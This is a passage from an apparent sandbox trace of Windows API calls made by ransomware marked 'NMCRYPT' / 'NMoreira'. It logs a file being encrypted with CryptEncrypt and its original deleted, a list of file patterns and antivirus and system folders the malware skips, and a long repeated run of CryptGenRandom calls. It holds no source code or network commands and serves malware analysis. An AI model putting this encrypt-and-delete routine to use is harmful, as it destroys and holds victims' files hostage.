nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x8, lpOverlapped=0x0) returned 1 [0166.866] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x8, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x10) returned 1 [0166.866] GetLastError () returned 0x0 [0166.866] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x10, lpOverlapped=0x0) returned 1 [0166.866] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.866] WriteFile (in: hFile=0x15c4, lpBuffer=0x2882cb0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.866] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc")) returned 0x20 [0166.866] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", dwFileAttributes=0x20) returned 0 [0166.867] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 1 [0166.867] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc")) returned 0 [0166.867] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" [0166.867] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0166.867] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXFF62.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxff62.tmp")) returned 0xff62 [0166.868] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXFF62.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxff62.tmp"), dwFlags=0x1) returned 0 [0166.868] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXFF62.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxff62.tmp")) returned 1 [0166.869] CryptDestroyKey (hKey=0x9ad138) returned 1 [0166.869] wcslen (_String="OK") returned 0x2 [0166.869] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.869] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.869] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0166.869] CryptDestroyHash (hHash=0x9ad178) returned 1 [0166.869] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0166.869] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*NMCRYPT") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*Recovers your files.html") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*.exe") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*.dll") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*.lnk") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*.bat") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*.ini") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*.msi") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*.scf") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*pagefile.sys*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*NTUSER.DAT*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*AppData*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\winrar\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\java\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\TeamViewer\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\windows\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\ESET\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\AVG\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\AVIRA\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*\\AVAST Software\\*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*Atheros*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*Realtek*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*bootmgr*") returned 0 [0166.869] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*boot*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*boot*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*CONFIG.SYS*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*IO.SYS*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*MSDOS.SYS*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*NTDETECT.COM*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*ntldr*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*chrome*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*opera*") returned 0 [0166.870] PathMatchSpecW (pszFile="adovbs.inc", pszSpec="*firefox*") returned 0 [0166.870] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", pszSpec="*") returned 1 [0166.870] strlen (_Str="NMoreira") returned 0x8 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.870] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.871] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.872] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: 